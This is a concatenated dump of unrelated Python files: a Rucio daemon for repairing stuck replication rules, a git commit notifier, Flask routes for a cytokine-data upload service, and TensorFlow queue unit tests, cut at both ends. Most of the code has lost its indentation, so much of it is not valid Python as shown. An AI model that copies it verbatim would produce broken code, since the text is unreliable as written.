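    assert list(bridge) == [0, 1, 2]
    producer.join()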
|
repairer.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import repair_rule, get_stuck_rules
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_repairer(once=False):
"""
Main loop to check for STUCK replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
executable = 'judge-repairer'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time()
            # Refresh paused rules: drop entries whose pause window has expired
            for key, expiry in list(paused_rules.items()):
                if datetime.utcnow() > expiry:
                    del paused_rules[key]
# Select a bunch of rules for this worker to repair
rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
delta=-1 if once else 1800,
limit=100,
                                    blacklisted_rules=list(paused_rules))
            logging.debug('rule_repairer[%s/%s] index query time %f, fetch size %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule_id in rules:
rule_id = rule_id[0]
logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
repair_rule(rule_id=rule_id)
logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Repairer threads.
"""
executable = 'judge-repairer'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_repairer(once)
else:
logging.info('Repairer starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
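# --- Illustrative sketch (added; not part of the original module) -----------
# A minimal example of how an entry point might wire the stop() handler above
# to process signals for a graceful shutdown; the flag values here are
# assumptions for this sketch, not Rucio's actual daemon launcher.
import signal

if __name__ == '__main__':
    signal.signal(signal.SIGTERM, stop)  # stop(signum, frame) sets graceful_stop
    signal.signal(signal.SIGINT, stop)
    run(once=False, threads=1)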
|
main.py | from notification.notification import Notification as nf
from git.git import Git
import threading
import time
branch = "master"
def worker():
    # Poll the repository every 30 seconds and raise a desktop notification
    # whenever a new commit lands on the watched branch.
    number_of_commit = Git.number_of_commit(branch)
    while True:
        new_number_of_commit = Git.number_of_commit(branch)
        if number_of_commit != new_number_of_commit:
            number_of_commit = new_number_of_commit
            notification = nf()
            notification.rise(title='New commit',
                              subtitle=Git.get_last_commit_author(branch),
                              message=Git.get_last_commit_message(branch))
        time.sleep(30)
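# The watcher thread below is non-daemonic, so the process stays alive after
# the main thread returns; set t.daemon = True before t.start() if the watcher
# should exit together with the main thread.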
if __name__ == '__main__':
t = threading.Thread(name='worker', target=worker)
t.start() |
routes.py | from flask import render_template, request
from werkzeug.utils import secure_filename
from app import app
import logging
import sys
import os
import pandas as pd
import json
import uuid
import flask_executor
import threading
from app.backend import server_tools, tools
UPLOAD_FOLDER = os.path.join(os.getcwd(), 'cytomod', 'data_files', 'data')  # sys.path.append() returns None, so assign the path directly
ALLOWED_EXTENSIONS = {'xlsx', 'xls'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
executor = flask_executor.Executor(app)
@app.route('/upload', methods=['POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
name = request.form.get('name_data')
id = {'id': uuid.uuid1(),
'status': 'PENDING',
'message': 'pending job'}
if name != '':
project_name = name
tools.create_folder(os.path.join('static/', id['id'].__str__()))
tools.create_folder(os.path.join('static/', id['id'].__str__(), 'data_files'))
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'process_id_status.xlsx'),
id)
else:
return json.dumps({ "error": 'cant access the server without a name' }), 403
if 'patients' in request.files:
patients = request.files['patients']
else:
patients = None
if 'cytokines' not in request.files:
return json.dumps({ "error": 'no cytokine file was found' }), 400
cytokines = request.files['cytokines']
# if user does not select file
if cytokines.filename == '':
return json.dumps({ "error": 'no cytokine file was found' }), 400
        if patients is not None:
if allowed_file(patients.filename):
filename = secure_filename(patients.filename)
patients.save(os.path.join(os.path.join(os.getcwd(), 'static', id['id'].__str__(), 'data_files'), filename))
if cytokines and allowed_file(cytokines.filename):
filename = secure_filename(cytokines.filename)
cytokines.save(os.path.join(os.path.join(os.getcwd(), 'static', id['id'].__str__(), 'data_files'), filename))
            if patients is not None:
files = pd.DataFrame([secure_filename(cytokines.filename), secure_filename(patients.filename), project_name])
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'data_files_and_project_names.xlsx'), files)
return {'id': id['id'],
'outcomes': True}
else:
files = pd.DataFrame([secure_filename(cytokines.filename), "no file", project_name])
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'data_files_and_project_names.xlsx'), files)
return {'id': id['id'],
'outcomes': False}
else:
return json.dumps({"error": 'no cytokine file was found' }), 400
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/status', methods=['POST'])
def method_status():
id = request.form.get('id')
if not os.path.exists(os.path.join('static', id, 'process_id_status.xlsx')):
        return {'status': 'RUN TIME ERROR',
                'message': 'project was deleted due to an internal server error, please try again'}
statuses = tools.read_excel(os.path.join('static/', id, 'process_id_status.xlsx'))
status = statuses['value'][1]
message = statuses['value'][2]
return {'status': status,
'message': message}
@app.route('/generate', methods=['POST'])
def generate():
logging.info(f'got a request {request.form}')
name = request.form.get('name_data')
if name == '':
return json.dumps({"error": 'please insert your data and project name'}), 400
id = request.form.get('id')
if id not in os.listdir('static'):
logging.warning(f'invalid id {id}, returning error')
return json.dumps({"error": 'invalid name'}), 400
id = {'id': id,
'status': 'PENDING'}
luminex = request.form.get('luminex') in ['true', '1', 'True', 'TRUE', 'on']
log_transform = request.form.get('log_transform') in ['true', '1', 'True', 'TRUE', 'on']
outcomes = request.form.get('outcomes')
covariates = request.form.get('covariates') # names of regression covariates to control for
log_column_names = request.form.get('log_column_names')
cytokines = request.form.get('cytokines', default='') # if none, will analyze all
    parameters = [name, id, request.form.get('name_compartment', default='Plasma'), luminex, log_transform,
                  request.form.get('max_testing_k', type=int, default=6), False,
                  outcomes.split(", "), covariates.split(", "), log_column_names.split(", "), cytokines.split(", ")]
    method = threading.Thread(target=server_tools.run_server, args=parameters)  # the list supplies run_server's positional arguments
method.daemon = True
method.start()
    logging.info(f'Thread {method.name} started running and calculating the method')
return {'id': id}
@app.route('/results', methods=['POST'])
def results():
id = request.form.get('id')
dir = os.listdir('static')
if id not in dir:
logging.warning(f'invalid id {id}, not found in {dir} returning error')
return json.dumps({"error": 'invalid name'}), 400
# todo: add check for file existence
results = server_tools.encode_images(id)
if results is None:
logging.warning(f'invalid id {id}, not found in {dir} returning error')
return json.dumps({"error": 'invalid name'}), 400
return results.to_json()
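# --- Illustrative sketch (added; not part of the original module) -----------
# A self-contained example of how a client might drive the /upload and /status
# endpoints above; the host/port, file name, and the `requests` dependency are
# assumptions for this sketch only.
def _demo_client(base_url='http://localhost:5000'):
    import requests
    with open('cytokines.xlsx', 'rb') as fh:
        upload = requests.post(base_url + '/upload',
                               data={'name_data': 'demo project'},
                               files={'cytokines': fh})
    job = upload.json()
    status = requests.post(base_url + '/status', data={'id': str(job['id'])})
    return status.json()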
# if __name__ == "__main__":
# app.run(ssl_context=('cert.pem', 'key.pem')) |
random_shuffle_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
